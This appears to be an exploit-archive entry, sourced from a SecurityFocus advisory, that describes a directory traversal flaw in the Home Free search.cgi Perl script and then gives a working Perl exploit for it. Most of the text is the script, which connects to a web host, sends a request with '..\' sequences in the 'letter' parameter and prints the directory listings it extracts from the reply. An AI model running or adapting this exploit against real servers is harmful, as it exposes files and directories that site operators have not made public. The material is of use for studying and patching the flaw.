36 lines
No EOL
1.3 KiB
Perl
Executable file
36 lines
No EOL
1.3 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/921/info
|
|
|
|
Home Free is a suite of Perl cgi scripts that allow a website to support user contributions of various types. One of the scripts, search.cgi, accepts a parameter called letter which can be any text string. The supplied argument can contain the '../' string, which the script will process. This can be used to obtain directory listings and the first line of files outside of the intended web filesystem.
|
|
|
|
|
|
#!/usr/bin/perl
|
|
#
|
|
# Quick exploit of the Home Free ./search.cgi script, allows you to list
|
|
# directories on the host.
|
|
#
|
|
#
|
|
|
|
use IO::Socket;
|
|
|
|
if ($ARGV[0] eq "") { die "no argument\n"; }
|
|
|
|
$asoc = IO::Socket::INET->new(Proto => "tcp",
|
|
PeerAddr => "target.host.net",
|
|
PeerPort => 80) ||
|
|
die "can't connect to host: $!";
|
|
|
|
select($asoc);
|
|
$| = 1;
|
|
|
|
print $asoc "GET /cgi-bin/search.cgi?letter=..\\..\\..\\..\\$ARGV[0]&start=1&perpage=all HTTP/1.0\n\n";
|
|
|
|
while(<$asoc>) {
|
|
if ($_ =~ /.+HREF.+TD.+/) {
|
|
@parts = split("\"", $_);
|
|
$foo = $parts[1];
|
|
@parts = split("/", $foo);
|
|
print STDOUT $parts[3];
|
|
print STDOUT "\n";
|
|
}
|
|
}
|
|
close(ASOC); |